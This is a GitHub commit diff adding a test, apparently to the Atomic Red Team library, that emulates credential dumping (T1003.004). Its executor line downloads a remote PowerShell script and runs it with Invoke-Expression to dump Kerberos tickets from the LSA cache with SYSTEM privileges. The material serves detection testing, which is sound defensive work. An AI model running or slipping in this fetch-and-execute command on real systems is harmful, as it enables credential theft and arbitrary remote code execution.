Update T1003.004.yaml (#2835)

* Update T1003.004.yaml

dumping kerberos tickets with dumper.ps1 powershell, by dumping the winlogon.exe

* Update T1003.004.yaml

---------

Co-authored-by: Hare Sudhan <code@0x6c.dev>
This commit is contained in:
skandler
2024-07-05 19:32:19 +02:00
committed by GitHub
parent 054798feb3
commit 4d30f39d6e
+15
View File
@@ -30,3 +30,18 @@ atomic_tests:
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump Kerberos Tickets from LSA using dumper.ps1
description: |
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
supported_platforms:
- windows
executor:
command: |
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
name: powershell
elevation_required: true